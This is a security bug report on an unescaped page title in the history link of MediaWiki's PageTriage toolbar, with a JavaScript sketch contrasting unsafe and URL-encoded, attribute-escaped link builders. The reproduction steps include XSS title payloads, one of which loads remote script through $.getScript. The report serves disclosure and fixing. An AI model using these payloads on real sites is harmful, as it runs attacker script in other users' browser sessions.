The page title in the URL of the history link in the PageTriage toolbar is not URL-encoded or escaped, which allows XSS (though successful exploitation is unlikely).
Steps to reproduce:
- Create a page with the title: "onmouseover="alert(0);"" (or create a title with a URL to external JS, e.g. "onmouseover="$.getScript('http://127.0.0.1/t.js')"")
- With an account that can patrol pages, visit the page and open the info tab
- Hover over the "show full history" link
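
The sketch below is an added example, not PageTriage's own code: it contrasts a link builder that concatenates the raw title into the href with one that URL-encodes and attribute-escapes it, using the first title from the steps above. The function names and the /w/index.php script path are assumptions.

```javascript
// Added example: hypothetical link builders, not PageTriage's actual code.
const SCRIPT_PATH = '/w/index.php'; // assumed wiki script path

// Vulnerable pattern: raw title concatenated into a double-quoted href.
function historyLinkUnsafe(title) {
  return '<a href="' + SCRIPT_PATH + '?title=' + title +
    '&action=history">show full history</a>';
}

// Minimal HTML escaping for a value placed inside a quoted attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened pattern: percent-encode the title for the query string, then
// HTML-escape the whole URL. encodeURIComponent leaves ' ( ) ! * untouched,
// so the attribute-escaping step is still needed.
function historyLinkSafe(title) {
  const url = SCRIPT_PATH + '?title=' + encodeURIComponent(title) +
    '&action=history';
  return '<a href="' + escapeAttr(url) + '">show full history</a>';
}

// Rough check: list the quoted attributes visible in the opening tag.
function attributeNames(html) {
  const openTag = html.slice(0, html.indexOf('>') + 1);
  const names = [];
  const re = /([a-zA-Z-]+)\s*=\s*"[^"]*"/g;
  let m;
  while ((m = re.exec(openTag)) !== null) names.push(m[1]);
  return names;
}

// Title taken from the reproduction steps above.
const reportedTitle = '"onmouseover="alert(0);"';
console.log(attributeNames(historyLinkUnsafe(reportedTitle)));
console.log(attributeNames(historyLinkSafe(reportedTitle)));
console.log(historyLinkSafe(reportedTitle));
```

With the unsafe builder the title's first quote closes the href and the rest is parsed as a separate event-handler attribute; the hardened builder keeps the whole title inside the href value.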